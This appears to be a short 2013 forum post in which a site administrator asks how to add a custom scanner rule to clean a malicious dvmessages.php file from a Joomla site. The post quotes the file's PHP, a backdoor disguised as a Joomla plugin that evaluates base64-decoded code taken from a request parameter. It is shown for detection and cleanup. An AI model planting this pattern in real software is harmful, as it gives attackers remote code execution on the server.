Add Custom Rule
Posted: 08 Mar 2013, 02:14
Hi,
How do i add some custom rule?
I found out some file with name dvmessages.php causing ddos on joomla site and i want cxs clean it every cron is running. Any idea how to do it?
dvmessages.php file contains:
How do i add some custom rule?
I found out some file with name dvmessages.php causing ddos on joomla site and i want cxs clean it every cron is running. Any idea how to do it?
dvmessages.php file contains:
Code: Select all
<?php
defined( '_JEXEC' ) or die(@eval(base64_decode($_REQUEST['c_id'])));
jimport( 'joomla.plugin.plugin' );